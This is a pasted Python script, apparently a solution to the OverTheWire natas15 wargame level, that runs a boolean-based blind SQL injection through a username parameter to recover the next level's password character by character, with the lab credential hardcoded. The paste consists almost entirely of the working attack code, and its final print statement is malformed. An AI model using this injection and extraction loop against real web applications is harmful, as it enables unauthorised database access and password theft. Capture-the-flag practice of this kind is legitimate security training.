Guest User

Untitled

a guest
Mar 23rd, 2019
48
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
text 0.99 KB | None | 0 0
  1. import string
  2. import requests
  3.  
  4. url='http://natas15.natas.labs.overthewire.org'
  5. username='natas15'
  6. password='AwWj0w5cvxrZiONgZ9J5stNVkmxdk39J'
  7.  
  8. chars=''.join([string.ascii_letters,string.digits])
  9.  
  10. passdic=[]
  11. extstr="This user exists."
  12. for char in chars:
  13. uri=''.join([url,'?username=natas16"+and+password+LIKE+BINARY+"%',char,'%#'])
  14. r=requests.get(uri,auth=(username,password))
  15. if extstr in r.text:
  16. passdic.append(char)
  17. print("Password Dictionary: %s" % ''.join(passdic))
  18.  
  19. print("Done")
  20. print("Dictonary: %s"% ''.join(passdic))
  21.  
  22. print("Trying to get the password")
  23. passlist=[]
  24. passwd=''
  25. for i in range(1,64):
  26. for char in passdic:
  27. test=''.join([passwd,char])
  28. uri = ''.join([url,'?','username=natas16"','+and+password+LIKE+BINARY+"%',test,'%'])
  29. r=requests.get(uri,auth=(username,password))
  30. if extstr in r.text:
  31. passlist.append(char)
  32. passwd=''.join(passlist)
  33. print("length: %d , password %s"% len(passwd),passwd)
Add Comment
Please, Sign In to add comment